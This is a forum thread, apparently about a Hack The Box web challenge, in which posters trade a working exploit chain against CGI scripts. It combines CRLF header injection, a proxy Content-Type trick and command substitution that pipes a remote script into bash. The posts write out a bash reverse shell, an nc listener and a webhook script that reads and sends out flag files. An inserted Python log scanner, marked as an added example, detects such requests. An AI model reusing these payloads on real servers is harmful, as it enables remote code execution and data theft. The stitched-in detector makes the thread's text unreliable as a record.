Posts: 13
Threads: 0
Joined: Nov 2024
(03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
I found an XSS but I'm not sure if it's the objective :/
Posts: 4
Threads: 0
Joined: Mar 2025
(03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
I have been stuck for a day now... I'm still an amateur but I'd appreciate any hint
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url that has your hosted file "index.html" that is just a bash revshell that will connect on the 9001 listener
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 11:56 AM)0x02b375 Wrote: This is it, thank you king!
Can you send me the request you used on Burp Suite? I tried, but it seems not to fetch the index file for some reason, even though it shows something was fetched on the server.
Posts: 70
Threads: 7
Joined: Jul 2024
curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
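For defenders reviewing web logs for requests shaped like the one posted above, here is an added example (not from any poster in this thread): a Python scan that decodes each query parameter and flags CR/LF characters, header-like lines after a line break, a `proxy:` value in an injected Content-Type, and shell command substitution. The log lines, client addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Pulls the request target out of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Rule names are hypothetical labels; each regex runs on a decoded parameter value.
RULES = {
    "crlf-in-param": re.compile(r"[\r\n]"),
    "injected-header": re.compile(r"[\r\n][A-Za-z-]+:"),
    "proxy-handler": re.compile(r"content-type:\s*proxy:", re.I),
    "shell-substitution": re.compile(r"\$\(|`"),
}

def scan_uri(uri):
    """Return the sorted rule names that match any decoded query parameter."""
    hits = set()
    for _key, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        for name, rx in RULES.items():
            if rx.search(value):
                hits.add(name)
    return sorted(hits)

def scan_log(lines):
    """Return (line_number, rule_names) for every log line with a finding."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hits = scan_uri(m.group(1)) if m else []
        if hits:
            findings.append((lineno, hits))
    return findings

# Constructed sample: one ordinary request, one shaped like the thread's request
# (documentation-range addresses stand in for real hosts).
SAMPLE = [
    '192.0.2.10 - - [23/Mar/2025:12:10:01 +0000] '
    '"GET /cgi-bin/attack-domain?target=example.com&name=alice HTTP/1.1" 302 310',
    '192.0.2.44 - - [23/Mar/2025:12:16:40 +0000] '
    '"GET /cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0a'
    'Content-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%'
    '$(curl%2b203.0.113.5:8000|sh)%26name=%0d%0a%0d%0a HTTP/1.1" 302 402',
]

if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE):
        print(f"line {lineno}: {', '.join(hits)}")
```
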
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 12:16 PM)x1rx Wrote: curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However, nothing on the nc listener. Is there something I am missing here?
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 12:47 PM)0x02b375 Wrote: what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your server
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
Makes total sense. Thanks!
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 12:47 PM)0x02b375 Wrote: what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your server
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
One last question. Can someone use the Hack The Box VPN and serve the file from there?
Posts: 13
Threads: 0
Joined: Nov 2024
(03-23-2025, 12:47 PM)0x02b375 Wrote: what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your server
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
Posts: 14
Threads: 0
Joined: Feb 2025
03-23-2025, 03:09 PM
(This post was last modified: 03-23-2025, 03:10 PM by oyfyic.)
(03-23-2025, 02:24 PM)0xhdfg Wrote: So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
I have set up the webhook exactly as you have said. Appreciate all the help, btw. The issue I have now is with the curl command, which outputs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>